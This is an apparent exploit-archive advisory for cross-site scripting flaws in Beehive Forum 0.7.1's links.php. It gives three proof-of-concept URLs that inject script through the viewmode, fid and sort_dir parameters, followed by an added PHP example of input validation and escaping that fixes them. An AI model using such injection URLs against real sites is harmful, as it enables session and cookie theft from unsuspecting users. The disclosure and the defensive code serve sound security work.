Beehive Forum 0.7.1 - links.php Multiple Cross-Site Scripting Vulnerabilities

2007-06-11T00:00:00
ID EXPLOITPACK:18E22BC2F03C422BE5D958E50D187E78
Type exploitpack
Reporter Ory Segal
Modified 2007-06-11T00:00:00

Description

source: https://www.securityfocus.com/bid/24413/info

Beehive Forum is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker may leverage any of these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Beehive Forum 0.71 is vulnerable; other versions may also be affected. 

http://www.example.com/forum/links.php?webtag=FORUM_NAME&fid=1&viewmode=>".><script>alert(1);</script>

http://www.example.com/forum/links.php?webtag=FOEUM_NAME&fid=>".><script>alert(1);</script>&viewmode=1

http://www.example.com/forum/links.php?webtag=FORUM_NAME&fid=1&viewmode=0&page=1&sort_by=CREATED&sort_dir="><script>alert(1)</script>
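
Server-side handling that closes the injection points shown in the URLs above (viewmode, fid, sort_dir), as an added example that is not Beehive Forum's own code: numeric parameters are parsed as integers, sort parameters are matched against an allow-list, and anything written back into HTML is escaped. The helper names and the allowed sort_by/sort_dir values are assumptions.

```php
<?php
// Added example, NOT Beehive Forum's code. Parameter names come from the
// advisory's URLs; helper names and allowed values below are assumptions.

const SORT_COLUMNS = ['CREATED', 'TITLE'];  // assumed sort_by allow-list
const SORT_DIRS    = ['ASC', 'DESC'];       // assumed sort_dir allow-list

/** Return an integer >= $min, or $default when the input is not one. */
function int_param(array $q, string $name, int $default, int $min = 0): int
{
    // Missing keys, arrays (fid[]=x) and non-numeric strings all yield false.
    $v = filter_var($q[$name] ?? null, FILTER_VALIDATE_INT,
                    ['options' => ['min_range' => $min]]);
    return $v === false ? $default : $v;
}

/** Return $q[$name] only when it strictly equals an allow-listed value. */
function enum_param(array $q, string $name, array $allowed, string $default): string
{
    $v = $q[$name] ?? $default;
    return (is_string($v) && in_array($v, $allowed, true)) ? $v : $default;
}

/** Escape for HTML text and quoted-attribute contexts. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Normalise the links.php query string into typed, validated values. */
function links_query(array $q): array
{
    return [
        'fid'      => int_param($q, 'fid', 1, 1),
        'viewmode' => int_param($q, 'viewmode', 0) === 1 ? 1 : 0,
        'page'     => int_param($q, 'page', 1, 1),
        'sort_by'  => enum_param($q, 'sort_by', SORT_COLUMNS, 'CREATED'),
        'sort_dir' => enum_param($q, 'sort_dir', SORT_DIRS, 'DESC'),
    ];
}

// Constructed input modelled on the advisory's third URL.
$clean = links_query([
    'fid' => '1', 'viewmode' => '0', 'page' => '1',
    'sort_by' => 'CREATED', 'sort_dir' => '"><script>alert(1)</script>',
]);
// Rebuild links from validated values only, then escape for the attribute.
echo '<a href="' . h('links.php?' . http_build_query($clean)) . '">next</a>', PHP_EOL;
```

Validation alone covers these parameters because each has a closed set of legal values; free-text fields still depend on the output escaping in h().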